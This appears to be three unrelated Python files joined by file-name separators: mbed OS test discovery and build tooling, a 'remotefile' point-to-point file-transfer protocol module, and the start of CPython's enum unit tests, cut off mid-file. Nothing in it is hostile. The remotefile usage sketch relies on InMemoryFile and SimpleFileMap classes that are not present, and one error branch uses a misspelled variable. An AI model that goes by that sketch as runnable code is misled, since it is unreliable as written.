help='Set global number of test loops per test. Default value is 1')
parser.add_argument('--consolidate-waterfall',
dest='consolidate_waterfall_test',
default=False,
action="store_true",
help='Used with --waterfall argument. Adds only one test to report reflecting outcome of waterfall test.')
parser.add_argument('-W', '--waterfall',
dest='waterfall_test',
default=False,
action="store_true",
help='Used with --loops or --global-loops arguments. Tests until OK result occurs and assumes test passed')
parser.add_argument('-N', '--firmware-name',
dest='firmware_global_name',
help='Set global name for all produced projects. Note: the proper file extension will be added by the build scripts')
parser.add_argument('-u', '--shuffle',
dest='shuffle_test_order',
default=False,
action="store_true",
help='Shuffles test execution order')
parser.add_argument('--shuffle-seed',
dest='shuffle_test_seed',
default=None,
help='Shuffle seed (If you want to reproduce your shuffle order please use seed provided in test summary)')
parser.add_argument('-f', '--filter',
dest='general_filter_regex',
type=argparse_many(str),
default=None,
help='For some commands you can use filter to filter out results')
parser.add_argument('--inc-timeout',
dest='extend_test_timeout',
metavar="NUMBER",
type=int,
help='You can increase global timeout for each test by specifying additional test timeout in seconds')
parser.add_argument('-l', '--log',
dest='log_file_name',
help='Log events to external file (note not all console entries may be visible in log file)')
parser.add_argument('--report-html',
dest='report_html_file_name',
help='You can log test suite results in form of HTML report')
parser.add_argument('--report-junit',
dest='report_junit_file_name',
help='You can log test suite results in form of JUnit compliant XML report')
parser.add_argument("--report-build",
dest="report_build_file_name",
help="Output the build results to a junit xml file")
parser.add_argument("--report-text",
dest="report_text_file_name",
help="Output the build results to a text file")
parser.add_argument('--verbose-skipped',
dest='verbose_skipped_tests',
default=False,
action="store_true",
help='Prints some extra information about skipped tests')
parser.add_argument('-V', '--verbose-test-result',
dest='verbose_test_result_only',
default=False,
action="store_true",
help='Prints test serial output')
parser.add_argument('-v', '--verbose',
dest='verbose',
default=False,
action="store_true",
help='Verbose mode (prints some extra information)')
parser.add_argument('--version',
dest='version',
default=False,
action="store_true",
help='Prints script version and exits')
parser.add_argument('--stats-depth',
dest='stats_depth',
default=2,
type=int,
help="Depth level for static memory report")
return parser
def test_path_to_name(path, base):
"""Change all slashes in a path into hyphens
This creates a unique cross-platform test name based on the path
This can eventually be overridden by a to-be-determined meta-data mechanism"""
name_parts = []
head, tail = os.path.split(relpath(path,base))
while (tail and tail != "."):
name_parts.insert(0, tail)
head, tail = os.path.split(head)
return "-".join(name_parts).lower()
def get_test_config(config_name, target_name):
"""Finds the path to a test configuration file
config_name: path to a custom configuration file OR mbed OS interface "ethernet, wifi_odin, etc"
target_name: name of target used to determine whether the given mbed OS interface is valid
returns path to config, will return None if no valid config is found
"""
# If they passed in a full path
if exists(config_name):
# This is a module config
return config_name
# Otherwise find the path to configuration file based on mbed OS interface
return TestConfig.get_config_path(config_name, target_name)
def find_tests(base_dir, target_name, toolchain_name, icetea, greentea, app_config=None):
""" Finds all tests in a directory recursively
:param base_dir: path to the directory to scan for tests (ex. 'path/to/project')
:param target_name: name of the target to use for scanning (ex. 'K64F')
:param toolchain_name: name of the toolchain to use for scanning (ex. 'GCC_ARM')
:param icetea: icetea enabled
:param greentea: greentea enabled
:param app_config - location of a chosen mbed_app.json file
returns a dictionary where keys are the test name, and the values are
lists of paths needed to build the test.
"""
# Temporary structure: tests referenced by (name, base, group, case) tuple
tests = {}
# List of common folders: (predicate function, path) tuple
commons = []
config = Config(target_name, base_dir, app_config)
# Scan the directory for paths to probe for 'TESTS' folders
base_resources = Resources(MockNotifier(), collect_ignores=True)
base_resources.scan_with_config(base_dir, config)
if greentea:
dirs = [d for d in base_resources.ignored_dirs if basename(d) == 'TESTS']
ignoreset = MbedIgnoreSet()
for directory in dirs:
ignorefile = join(directory, IGNORE_FILENAME)
if isfile(ignorefile):
ignoreset.add_mbedignore(directory, ignorefile)
for test_group_directory in os.listdir(directory):
grp_dir = join(directory, test_group_directory)
if not isdir(grp_dir) or ignoreset.is_ignored(grp_dir):
continue
grpignorefile = join(grp_dir, IGNORE_FILENAME)
if isfile(grpignorefile):
ignoreset.add_mbedignore(grp_dir, grpignorefile)
for test_case_directory in os.listdir(grp_dir):
d = join(directory, test_group_directory, test_case_directory)
if not isdir(d) or ignoreset.is_ignored(d):
continue
special_dirs = ['host_tests', 'COMMON']
if test_group_directory not in special_dirs and test_case_directory not in special_dirs:
test_name = test_path_to_name(d, base_dir)
tests[(test_name, directory, test_group_directory, test_case_directory)] = [d]
if test_case_directory == 'COMMON':
def predicate(base_pred, group_pred, name_base_group_case):
(name, base, group, case) = name_base_group_case
return base == base_pred and group == group_pred
commons.append((functools.partial(predicate, directory, test_group_directory), d))
if test_group_directory == 'COMMON':
def predicate(base_pred, name_base_group_case):
(name, base, group, case) = name_base_group_case
return base == base_pred
commons.append((functools.partial(predicate, directory), grp_dir))
if icetea:
dirs = [d for d in base_resources.ignored_dirs if basename(d) == 'TEST_APPS']
for directory in dirs:
if not isdir(directory):
continue
for subdir in os.listdir(directory):
d = join(directory, subdir)
if not isdir(d):
continue
if 'device' == subdir:
for test_dir in os.listdir(d):
test_dir_path = join(d, test_dir)
test_name = test_path_to_name(test_dir_path, base_dir)
tests[(test_name, directory, subdir, test_dir)] = [test_dir_path]
# Apply common directories
for pred, path in commons:
for test_identity, test_paths in six.iteritems(tests):
if pred(test_identity):
test_paths.append(path)
# Drop identity besides name
return {name: paths for (name, _, _, _), paths in six.iteritems(tests)}
def print_tests(tests, format="list", sort=True):
"""Given a dictionary of tests (as returned from "find_tests"), print them
in the specified format"""
if format == "list":
for test_name in sorted(tests.keys()):
test_path = tests[test_name][0]
print("Test Case:")
print(" Name: %s" % test_name)
print(" Path: %s" % test_path)
elif format == "json":
print(json.dumps({test_name: test_paths[0] for test_name, test_paths
in tests.items()}, indent=2))
else:
print("Unknown format '%s'" % format)
sys.exit(1)
def norm_relative_path(path, start):
"""This function will create a normalized, relative path. It mimics the
python os.path.relpath function, but also normalizes a Windows-style path
that uses backslashes to a Unix-style path that uses forward slashes."""
path = os.path.normpath(path)
path = os.path.relpath(path, start)
path = path.replace("\\", "/")
return path
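# Usage sketch: the path is normalized, made relative to `start`, and any
# backslashes (on Windows hosts) are converted to forward slashes, e.g.
#
#   norm_relative_path('./BUILD/tests/./a.bin', '.')   # -> 'BUILD/tests/a.bin'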
def build_test_worker(*args, **kwargs):
"""This is a worker function for the parallel building of tests. The `args`
and `kwargs` are passed directly to `build_project`. It returns a dictionary
with the following structure:
{
'result': `True` if no exceptions were thrown, `False` otherwise
'reason': Instance of exception that was thrown on failure
'bin_file': Path to the created binary if `build_project` was
successful. Not present otherwise
'kwargs': The keyword arguments that were passed to `build_project`.
This includes arguments that were modified (ex. report)
}
"""
ret = {
'result': False,
'args': args,
'kwargs': kwargs
}
# Use parent TOOLCHAIN_PATHS variable
for key, value in kwargs['toolchain_paths'].items():
TOOLCHAIN_PATHS[key] = value
del kwargs['toolchain_paths']
try:
bin_file, _ = build_project(*args, **kwargs)
ret['result'] = True
ret['bin_file'] = bin_file
ret['kwargs'] = kwargs
except NotSupportedException as e:
ret['reason'] = e
except ToolException as e:
ret['reason'] = e
except KeyboardInterrupt as e:
ret['reason'] = e
except:
# Print unhandled exceptions here
import traceback
traceback.print_exc(file=sys.stdout)
return ret
def build_tests(tests, base_source_paths, build_path, target, toolchain_name,
clean=False, notify=None, jobs=1, macros=None,
silent=False, report=None, properties=None,
continue_on_build_fail=False, app_config=None,
build_profile=None, stats_depth=None, ignore=None,
resource_filter=None):
"""Given the data structure from 'find_tests' and the typical build parameters,
build all the tests
Returns a tuple of the build result (True or False) followed by the test
build data structure"""
execution_directory = "."
base_path = norm_relative_path(build_path, execution_directory)
if isinstance(target, Target):
target_name = target.name
else:
target_name = target
target = TARGET_MAP[target_name]
cfg, _, _, _ = get_config(base_source_paths, target, app_config=app_config)
baud_rate = 9600
if 'platform.stdio-baud-rate' in cfg:
baud_rate = cfg['platform.stdio-baud-rate'].value
test_build = {
"platform": target_name,
"toolchain": toolchain_name,
"base_path": base_path,
"baud_rate": baud_rate,
"binary_type": "bootable",
"tests": {},
"test_apps": {}
}
jobs_count = int(jobs if jobs else cpu_count())
p = Pool(processes=jobs_count)
results = []
for test_name, test_paths in tests.items():
if not isinstance(test_paths, list):
test_paths = [test_paths]
test_build_path = os.path.join(build_path, test_paths[0])
src_paths = base_source_paths + test_paths
test_case_folder_name = os.path.basename(test_paths[0])
args = (src_paths, test_build_path, deepcopy(target), toolchain_name)
kwargs = {
'jobs': 1,
'clean': clean,
'macros': macros,
'name': test_case_folder_name,
'project_id': test_name,
'report': report,
'properties': properties,
'app_config': app_config,
'build_profile': build_profile,
'toolchain_paths': TOOLCHAIN_PATHS,
'stats_depth': stats_depth,
'notify': MockNotifier(),
'resource_filter': resource_filter
}
results.append(p.apply_async(build_test_worker, args, kwargs))
p.close()
result = True
itr = 0
while len(results):
itr += 1
if itr > 360000:
p.terminate()
p.join()
raise ToolException("Compile did not finish in 10 minutes")
else:
sleep(0.01)
pending = 0
for r in results:
if r.ready() is True:
try:
worker_result = r.get()
results.remove(r)
# Push all deferred notifications out to the actual notifier
new_notify = deepcopy(notify)
for message in worker_result['kwargs']['notify'].messages:
new_notify.notify(message)
# Take report from the kwargs and merge it into existing report
if report:
report_entry = worker_result['kwargs']['report'][target_name][toolchain_name]
report_entry[worker_result['kwargs']['project_id'].upper()][0][0]['output'] = new_notify.get_output()
for test_key in report_entry.keys():
report[target_name][toolchain_name][test_key] = report_entry[test_key]
# Set the overall result to a failure if a build failure occurred
if ('reason' in worker_result and
worker_result['reason'] and
not isinstance(worker_result['reason'], NotSupportedException)):
result = False
break
# Adding binary path to test build result
if ('result' in worker_result and
worker_result['result'] and
'bin_file' in worker_result):
bin_file = norm_relative_path(worker_result['bin_file'], execution_directory)
test_key = 'test_apps' if 'test_apps-' in worker_result['kwargs']['project_id'] else 'tests'
test_build[test_key][worker_result['kwargs']['project_id']] = {
"binaries": [
{
"path": bin_file
}
]
}
test_key = worker_result['kwargs']['project_id'].upper()
print('Image: %s\n' % bin_file)
except:
if p._taskqueue.queue:
p._taskqueue.queue.clear()
sleep(0.5)
p.terminate()
p.join()
raise
else:
pending += 1
if pending >= jobs_count:
break
# Break as soon as possible if there is a failure and we are not
# continuing on build failures
if not result and not continue_on_build_fail:
if p._taskqueue.queue:
p._taskqueue.queue.clear()
sleep(0.5)
p.terminate()
break
p.join()
test_builds = {}
test_builds["%s-%s" % (target_name, toolchain_name)] = test_build
return result, test_builds
def test_spec_from_test_builds(test_builds):
for build in test_builds:
# Convert TZ target name to test spec platform name
#
# 1. All TZ targets should have name pattern: PLATFORM_[NPSA_]S/NS, where:
# (1) 'PLATFORM' for test spec platform name
# (2) 'NPSA' for non-PSA targets. Defaults to PSA target if absent.
# (3) 'S'/'NS' for secure/non-secure targets
# 2. Secure target may participate in Greentea, so its name is also truncated here.
if Target.get_target(test_builds[build]['platform']).is_TrustZone_target:
if test_builds[build]['platform'].endswith('_NS'):
test_builds[build]['platform'] = test_builds[build]['platform'][:-3]
elif test_builds[build]['platform'].endswith('_S'):
test_builds[build]['platform'] = test_builds[build]['platform'][:-2]
if test_builds[build]['platform'].endswith('_NPSA'):
test_builds[build]['platform'] = test_builds[build]['platform'][:-5]
return {
"builds": test_builds
}
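# Renaming sketch (hypothetical TrustZone platform names): a build entry whose
# platform is reported as 'SOME_TZ_TARGET_NS' would be emitted as 'SOME_TZ_TARGET',
# and a non-PSA secure variant 'SOME_TZ_TARGET_NPSA_S' would be truncated first to
# 'SOME_TZ_TARGET_NPSA' and then to 'SOME_TZ_TARGET', so both map onto the same
# test spec platform name.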
|
__init__.py
|
import sys
import struct
import abc
import queue
import threading
#constants
RMF_CMD_START_ADDR = 0x3FFFFC00
RMF_FILE_TYPE_FIXED = 0
RMF_FILE_TYPE_DYNAMIC = 1
RMF_FILE_TYPE_STREAM = 2
RMF_CMD_ACK = 0 #reserved for future use
RMF_CMD_NACK = 1 #reserved for future use
RMF_CMD_EOT = 2 #reserved for future use
RMF_CMD_FILE_INFO = 3
RMF_CMD_FILE_OPEN = 10
RMF_CMD_FILE_CLOSE = 11
RMF_DIGEST_TYPE_NONE = 0
RMF_MSG_CONNECT = 0
RMF_MSG_FILEINFO = 1
RMF_MSG_FILEOPEN = 2
RMF_MSG_FILECLOSE = 3
RMF_MSG_WRITE_DATA = 4
RMF_FILEINFO_BASE_LEN = 48
def unpackHeader(data):
"""
Returns tuple (bytes_parsed, address, more_bit)
"""
i=0
bytes_parsed=0
more_bit=False
address=None
if((i+1)<len(data)): #parse 16-bits
b1,b2=data[i:i+2];i+=2
if b1 & 0x40: more_bit=True
if b1 & 0x80:
#high bit is set, parse the next 16 bits to form a full 30-bit address (2 bits reserved for flags)
b1&=0x3F
if (i+2)<len(data):
b3,b4=data[i:i+2];i+=2
address=(b1<<24)|(b2<<16)|(b3<<8)|b4
else:
#16-bit header: the remaining 14 bits form the address
b1&=0x3F
address=(b1<<8)|(b2)
if address is not None:
bytes_parsed = i
return (bytes_parsed,address,more_bit)
def packHeader(address, more_bit=False):
"""
packs address and more_bit into bytearray
returns bytes
"""
if address<16384:
#address fits into a 16-bit header (14 address bits)
b1,b2=(address>>8)&0x3F,address&0xFF
if more_bit: b1|=0x40
return bytes([b1,b2])
elif address <1073741824:
b1,b2,b3,b4=(address>>24)&0x3F,(address>>16)&0xFF,(address>>8)&0xFF,address&0xFF
if more_bit: b1|=0x40
return bytes([b1|0x80,b2,b3,b4])
else:
raise ValueError('address must be less than 1073741824')
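# Round-trip sketch: an address below 16384 packs into a two-byte header and a
# 30-bit address into four bytes; unpackHeader() reverses the encoding, e.g.
#
#   hdr = packHeader(0x1234, more_bit=True)   # -> bytes([0x52, 0x34])
#   unpackHeader(hdr + b'payload')            # -> (2, 0x1234, True)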
def packFileInfo(file, byte_order='<'):
"""
packs a File object (FILEINFO struct) into bytes
"""
if file.address is None:
raise ValueError('FileInfo object does not have an address')
if (byte_order != '<') and (byte_order != '>'):
raise ValueError('unknown byte_order: '+str(byte_order))
fmt='%s3I2H32s%ds'%(byte_order,len(file.name))
return struct.pack(fmt, RMF_CMD_FILE_INFO, file.address, file.length, file.fileType, file.digestType,
file.digestData,bytes(file.name,encoding='ascii'))
def unpackFileInfo(data, byte_order='<'):
"""
unpacks a File object (FILEINFO struct) from the bytes in data
"""
if (byte_order != '<') and (byte_order != '>'):
raise ValueError('unknown byte_order: '+str(byte_order))
fmt='%s3I2H32s'%(byte_order)
assert struct.calcsize(fmt) == RMF_FILEINFO_BASE_LEN
if len(data)>=RMF_FILEINFO_BASE_LEN:
part1=data[0:RMF_FILEINFO_BASE_LEN]
part2=data[RMF_FILEINFO_BASE_LEN:]
(cmdType, address, length, fileType, digestType, digestData) = struct.unpack(fmt,part1)
endOffset=None
for i in range(0,len(part2)):
if part2[i]==0:
endOffset=i
break
if endOffset is not None:
name = str(part2[0:endOffset],encoding='utf-8')
else:
name = str(part2[0:],encoding='utf-8')
file = File(name, length, fileType, address)
file.digestType=digestType
file.digestData=digestData
return file
else:
return None
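# Round-trip sketch (hypothetical file): packFileInfo()/unpackFileInfo() serialize
# the FILEINFO struct using the File class defined further down in this module, e.g.
#
#   f = File('example.txt', 100, RMF_FILE_TYPE_FIXED, address=0x1000)
#   data = packFileInfo(f)
#   g = unpackFileInfo(data)
#   assert (g.name, g.length, g.address) == ('example.txt', 100, 0x1000)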
def packFileOpen(address, byte_order='<'):
if (byte_order != '<') and (byte_order != '>'):
raise ValueError('unknown byte_order: '+str(byte_order))
fmt='%s2I'%(byte_order)
return struct.pack(fmt, RMF_CMD_FILE_OPEN, address)
def unpackFileOpen(data, byte_order='<'):
if (byte_order != '<') and (byte_order != '>'):
raise ValueError('unknown byte_order: '+str(byte_order))
fmt='%s2I'%(byte_order)
cmdType,address = struct.unpack(fmt, data)
if cmdType != RMF_CMD_FILE_OPEN:
raise ValueError('expected RMF_CMD_FILE_OPEN')
return address
def packFileClose(address, byte_order='<'):
if (byte_order != '<') and (byte_order != '>'):
raise ValueError('unknown byte_order: '+str(byte_order))
fmt='%s2I'%(byte_order)
return struct.pack(fmt, RMF_CMD_FILE_CLOSE, address)
def unpackFileClose(data, byte_order='<'):
if (byte_order != '<') and (byte_order != '>'):
raise ValueError('unknown byte_order: '+str(byte_order))
fmt='%s2I'%(byte_order)
cmdType,address = struct.unpack(fmt, data)
if cmdType != RMF_CMD_FILE_CLOSE:
raise ValueError('expected RMF_CMD_FILE_CLOSE')
return address
class TransmitHandler(metaclass=abc.ABCMeta):
def getSendAvail(self,): return None
@abc.abstractmethod
def send(self, data : bytes):
"""
send data bytes
"""
class ReceiveHandler(metaclass=abc.ABCMeta):
@abc.abstractmethod
def onMsgReceived(self, msg):
"""
called by socket adapter when a message has been received
"""
@abc.abstractmethod
def onConnected(self, transmitHandler):
"""
called by socket adapter on a new connection, a reference to self (the socket adapter) is given as the argument
"""
class File:
"""
Base class for File. This can be inherited from in case you need more properties (e.g. APX).
Note: in the C implementation this class is called FileInfo_t
"""
def __init__(self, name, length, fileType=RMF_FILE_TYPE_FIXED, address=None):
self.name = str(name) #part of FILEINFO struct
self.length = int(length) #part of FILEINFO struct
self.fileType = int(fileType) #part of FILEINFO struct
self.address = address #part of FILEINFO struct
self.digestType = RMF_DIGEST_TYPE_NONE #part of FILEINFO struct
self.digestData = bytes([0]*32) #part of FILEINFO struct
self.isRemoteFile=False #not part of FILEINFO struct
self.isOpen=False #not part of FILEINFO struct
def open(self):
self.isOpen=True
def close(self):
self.isOpen=False
class FileMap(metaclass=abc.ABCMeta):
"""
abstract base class of FileMap
FileMaps are used by the FileManager class.
It is expected that files in the FileMap are sorted by address (in ascending order)
"""
@abc.abstractmethod
def insert(self, file):
"""
inserts file into the FileMap. The FileMap must assign an address to the file when inserted
"""
@abc.abstractmethod
def remove(self, file):
"""
removes file from FileMap.
"""
@ReceiveHandler.register
class FileManager:
"""
The FileManager manages local and remote files mapped to a point-to-point connection
"""
def __init__(self, localFileMap, remoteFileMap):
assert(isinstance(localFileMap, FileMap))
assert(isinstance(remoteFileMap, FileMap))
self.localFileMap = localFileMap
self.remoteFileMap = remoteFileMap
self.requestedFiles = {}
self.byteOrder='<' #use '<' for little endian, '>' for big endian
def worker():
"""
this is the worker thread.
It awaits commands in the message queue (self.msgQueue). When the special message None arrives it quits
"""
transmitHandler=None
while True:
msg = self.msgQueue.get()
if msg is None:
break
msgType=msg[0]
if msgType == RMF_MSG_CONNECT:
transmitHandler=msg[1]
elif msgType == RMF_MSG_FILEINFO:
fileInfo=msg[1]
header = packHeader(RMF_CMD_START_ADDR)
if transmitHandler is not None:
transmitHandler.send(header+fileInfo)
elif msgType == RMF_MSG_WRITE_DATA:
(address,data)=msg[1:3]
header = packHeader(address)
if transmitHandler is not None:
transmitHandler.send(header+data)
elif msgType == RMF_MSG_FILEOPEN:
data = packFileOpen(msg[1])
header = packHeader(RMF_CMD_START_ADDR)
if transmitHandler is not None:
transmitHandler.send(header+data)
else:
raise NotImplementedError(msgType)
self.msgQueue = queue.Queue()
self.worker_active=False
self.worker = threading.Thread(target=worker)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
self.stop()
def start(self):
self.worker_active=True
self.worker.start()
def stop(self):
if self.worker_active:
#send special message None to stop the worker thread
self.msgQueue.put(None)
self.worker.join()
self.worker=None
self.worker_active=False
def _FileInfo_handler(self, msg):
print("_FileInfo_handler")
def attachLocalFile(self, file):
self.localFileMap.insert(file)
file.fileManager=self
def requestRemoteFile(self, file):
self.requestedFiles[file.name]=file
#ReceiveHandler API
def onMsgReceived(self, msg):
bytes_parsed,address,more_bit = unpackHeader(msg)
if bytes_parsed>0:
if address==RMF_CMD_START_ADDR:
self._processCmd(msg[bytes_parsed:])
elif address<RMF_CMD_START_ADDR:
self._processFileWrite(address, more_bit, msg[bytes_parsed:])
else:
raise ValueError("invalid address %d"%address)
def onConnected(self, transmitHandler):
"""
called on new connection
"""
print("FileManager.onConnected")
self.msgQueue.put((RMF_MSG_CONNECT,transmitHandler))
for file in self.localFileMap:
self.msgQueue.put((RMF_MSG_FILEINFO,packFileInfo(file)))
def _processCmd(self, data):
fmt = self.byteOrder+'I'
size=struct.calcsize(fmt)
if len(data)>=size:
(cmd,) = struct.unpack(fmt,data[0:size])
if cmd==RMF_CMD_FILE_INFO:
remoteFile = unpackFileInfo(data, self.byteOrder)
#check if this is a requested file
if remoteFile.name in self.requestedFiles:
requestedFile = self.requestedFiles[remoteFile.name]
if requestedFile.length == remoteFile.length:
del self.requestedFiles[requestedFile.name]
requestedFile.address=remoteFile.address
requestedFile.fileType=remoteFile.fileType
requestedFile.digestType=remoteFile.digestType
requestedFile.digestData=remoteFile.digestData
requestedFile.open()
self.remoteFileMap.insert(requestedFile)
print("sending request to open file %s"%requestedFile.name)
msg=(RMF_MSG_FILEOPEN, requestedFile.address)
self.msgQueue.put(msg)
else:
print("[remoteFile.FileManager] FileInfo received for %s but with length=%d, expected length=%d"%(requstedFile.name, remoteFile.length, requstedFile.length))
else:
self.remoteFileMap.insert(remoteFile)
elif cmd==RMF_CMD_FILE_OPEN:
address = unpackFileOpen(data, self.byteOrder)
file = self.localFileMap.findByAddress(address)
if file is not None:
print("FileManager.open(%s)"%file.name)
file.open()
fileContent = file.read(0,file.length)
if fileContent is not None:
msg=(RMF_MSG_WRITE_DATA,file.address, fileContent)
self.msgQueue.put(msg)
elif cmd==RMF_CMD_FILE_CLOSE:
address = unpackFileClose(data, self.byteOrder)
file = self.localFileMap.findByAddress(address)
if file is not None:
print("FileManager.close(%s)"%file.name)
file.close()
else:
print("[remotefile] unknown command %d"%cmd,file=sys.stderr)
def _processFileWrite(self, address, more_bit, data):
remoteFile = self.remoteFileMap.findByAddress(address)
        if remoteFile is not None and remoteFile.isOpen:
offset = address-remoteFile.address
if (offset>=0) and (offset+len(data)<=remoteFile.length):
remoteFile.write(offset, data, more_bit)
def outPortDataWriteNotify(self, file: File, offset : int, length : int):
assert(file.address is not None)
fileContent=file.read(offset, length)
if fileContent is not None:
msg=(RMF_MSG_WRITE_DATA,file.address+offset, fileContent)
self.msgQueue.put(msg)
from remotefile.socket_adapter import TcpSocketAdapter
from remotefile.proto import readLine
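# --- Illustrative usage sketch (not part of the original module) ---
# Wires the classes above together using the InMemoryFile and SimpleFileMap
# sketches defined earlier. The transport is omitted because its constructor is
# not shown here; in a real setup a socket adapter (e.g. TcpSocketAdapter) would
# call fileManager.onConnected(...) and onMsgReceived(...) as data arrives.
if __name__ == '__main__':
    localMap = SimpleFileMap(startAddress=0)
    remoteMap = SimpleFileMap(startAddress=0x10000)
    with FileManager(localMap, remoteMap) as fm:
        fm.start()
        fm.attachLocalFile(InMemoryFile('greeting.txt', b'hello remote side'))
        # length must match the FILEINFO the remote side will announce
        fm.requestRemoteFile(InMemoryFile('status.bin', bytes(16)))
        # ...connect a transport here and let it drive the callbacks...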
|
test_enum.py
|
import enum
import inspect
import pydoc
import sys
import unittest
import threading
from collections import OrderedDict
from enum import Enum, IntEnum, StrEnum, EnumMeta, Flag, IntFlag, unique, auto
from io import StringIO
from pickle import dumps, loads, PicklingError, HIGHEST_PROTOCOL
from test import support
from test.support import ALWAYS_EQ
from test.support import threading_helper
from datetime import timedelta
# for pickle tests
try:
class Stooges(Enum):
LARRY = 1
CURLY = 2
MOE = 3
except Exception as exc:
Stooges = exc
try:
class IntStooges(int, Enum):
LARRY = 1
CURLY = 2
MOE = 3
except Exception as exc:
IntStooges = exc
try:
class FloatStooges(float, Enum):
LARRY = 1.39
CURLY = 2.72
MOE = 3.142596
except Exception as exc:
FloatStooges = exc
try:
class FlagStooges(Flag):
LARRY = 1
CURLY = 2
MOE = 3
except Exception as exc:
FlagStooges = exc
# for pickle test and subclass tests
class Name(StrEnum):
BDFL = 'Guido van Rossum'
FLUFL = 'Barry Warsaw'
try:
Question = Enum('Question', 'who what when where why', module=__name__)
except Exception as exc:
Question = exc
try:
Answer = Enum('Answer', 'him this then there because')
except Exception as exc:
Answer = exc
try:
Theory = Enum('Theory', 'rule law supposition', qualname='spanish_inquisition')
except Exception as exc:
Theory = exc
# for doctests
try:
class Fruit(Enum):
TOMATO = 1
BANANA = 2
CHERRY = 3
except Exception:
pass
def test_pickle_dump_load(assertion, source, target=None):
if target is None:
target = source
for protocol in range(HIGHEST_PROTOCOL + 1):
assertion(loads(dumps(source, protocol=protocol)), target)
def test_pickle_exception(assertion, exception, obj):
for protocol in range(HIGHEST_PROTOCOL + 1):
with assertion(exception):
dumps(obj, protocol=protocol)
class TestHelpers(unittest.TestCase):
# _is_descriptor, _is_sunder, _is_dunder
def test_is_descriptor(self):
class foo:
pass
for attr in ('__get__','__set__','__delete__'):
obj = foo()
self.assertFalse(enum._is_descriptor(obj))
setattr(obj, attr, 1)
self.assertTrue(enum._is_descriptor(obj))
def test_is_sunder(self):
for s in ('_a_', '_aa_'):
self.assertTrue(enum._is_sunder(s))
for s in ('a', 'a_', '_a', '__a', 'a__', '__a__', '_a__', '__a_', '_',
'__', '___', '____', '_____',):
self.assertFalse(enum._is_sunder(s))
def test_is_dunder(self):
for s in ('__a__', '__aa__'):
self.assertTrue(enum._is_dunder(s))
for s in ('a', 'a_', '_a', '__a', 'a__', '_a_', '_a__', '__a_', '_',
'__', '___', '____', '_____',):
self.assertFalse(enum._is_dunder(s))
# for subclassing tests
class classproperty:
def __init__(self, fget=None, fset=None, fdel=None, doc=None):
self.fget = fget
self.fset = fset
self.fdel = fdel
if doc is None and fget is not None:
doc = fget.__doc__
self.__doc__ = doc
def __get__(self, instance, ownerclass):
return self.fget(ownerclass)
# tests
class TestEnum(unittest.TestCase):
def setUp(self):
class Season(Enum):
SPRING = 1
SUMMER = 2
AUTUMN = 3
WINTER = 4
self.Season = Season
class Konstants(float, Enum):
E = 2.7182818
PI = 3.1415926
TAU = 2 * PI
self.Konstants = Konstants
class Grades(IntEnum):
A = 5
B = 4
C = 3
D = 2
F = 0
self.Grades = Grades
class Directional(str, Enum):
EAST = 'east'
WEST = 'west'
NORTH = 'north'
SOUTH = 'south'
self.Directional = Directional
from datetime import date
class Holiday(date, Enum):
NEW_YEAR = 2013, 1, 1
IDES_OF_MARCH = 2013, 3, 15
self.Holiday = Holiday
def test_dir_on_class(self):
Season = self.Season
self.assertEqual(
set(dir(Season)),
set(['__class__', '__doc__', '__members__', '__module__',
'SPRING', 'SUMMER', 'AUTUMN', 'WINTER']),
)
def test_dir_on_item(self):
Season = self.Season
self.assertEqual(
set(dir(Season.WINTER)),
set(['__class__', '__doc__', '__module__', 'name', 'value']),
)
def test_dir_with_added_behavior(self):
class Test(Enum):
this = 'that'
these = 'those'
def wowser(self):
return ("Wowser! I'm %s!" % self.name)
self.assertEqual(
set(dir(Test)),
set(['__class__', '__doc__', '__members__', '__module__', 'this', 'these']),
)
self.assertEqual(
set(dir(Test.this)),
set(['__class__', '__doc__', '__module__', 'name', 'value', 'wowser']),
)
def test_dir_on_sub_with_behavior_on_super(self):
# see issue22506
class SuperEnum(Enum):
def invisible(self):
return "did you see me?"
class SubEnum(SuperEnum):
sample = 5
self.assertEqual(
set(dir(SubEnum.sample)),
set(['__class__', '__doc__', '__module__', 'name', 'value', 'invisible']),
)
def test_dir_on_sub_with_behavior_including_instance_dict_on_super(self):
# see issue40084
class SuperEnum(IntEnum):
def __new__(cls, value, description=""):
obj = int.__new__(cls, value)
obj._value_ = value
obj.description = description
return obj
class SubEnum(SuperEnum):
sample = 5
self.assertTrue({'description'} <= set(dir(SubEnum.sample)))
def test_enum_in_enum_out(self):
Season = self.Season
self.assertIs(Season(Season.WINTER), Season.WINTER)
def test_enum_value(self):
Season = self.Season
self.assertEqual(Season.SPRING.value, 1)
def test_intenum_value(self):
self.assertEqual(IntStooges.CURLY.value, 2)
def test_enum(self):
Season = self.Season
lst = list(Season)
self.assertEqual(len(lst), len(Season))
self.assertEqual(len(Season), 4, Season)
self.assertEqual(
[Season.SPRING, Season.SUMMER, Season.AUTUMN, Season.WINTER], lst)
for i, season in enumerate('SPRING SUMMER AUTUMN WINTER'.split(), 1):
e = Season(i)
self.assertEqual(e, getattr(Season, season))
self.assertEqual(e.value, i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, season)
self.assertIn(e, Season)
self.assertIs(type(e), Season)
self.assertIsInstance(e, Season)
self.assertEqual(str(e), 'Season.' + season)
self.assertEqual(
repr(e),
'<Season.{0}: {1}>'.format(season, i),
)
def test_value_name(self):
Season = self.Season
self.assertEqual(Season.SPRING.name, 'SPRING')
self.assertEqual(Season.SPRING.value, 1)
with self.assertRaises(AttributeError):
Season.SPRING.name = 'invierno'
with self.assertRaises(AttributeError):
Season.SPRING.value = 2
def test_changing_member(self):
Season = self.Season
with self.assertRaises(AttributeError):
Season.WINTER = 'really cold'
def test_attribute_deletion(self):
class Season(Enum):
SPRING = 1
SUMMER = 2
AUTUMN = 3
WINTER = 4
def spam(cls):
pass
self.assertTrue(hasattr(Season, 'spam'))
del Season.spam
self.assertFalse(hasattr(Season, 'spam'))
with self.assertRaises(AttributeError):
del Season.SPRING
with self.assertRaises(AttributeError):
del Season.DRY
with self.assertRaises(AttributeError):
del Season.SPRING.name
def test_bool_of_class(self):
class Empty(Enum):
pass
self.assertTrue(bool(Empty))
def test_bool_of_member(self):
class Count(Enum):
zero = 0
one = 1
two = 2
for member in Count:
self.assertTrue(bool(member))
def test_invalid_names(self):
with self.assertRaises(ValueError):
class Wrong(Enum):
mro = 9
with self.assertRaises(ValueError):
class Wrong(Enum):
                _create_ = 11
with self.assertRaises(ValueError):
class Wrong(Enum):
_get_mixins_ = 9
with self.assertRaises(ValueError):
class Wrong(Enum):
_find_new_ = 1
with self.assertRaises(ValueError):
class Wrong(Enum):
_any_name_ = 9
def test_bool(self):
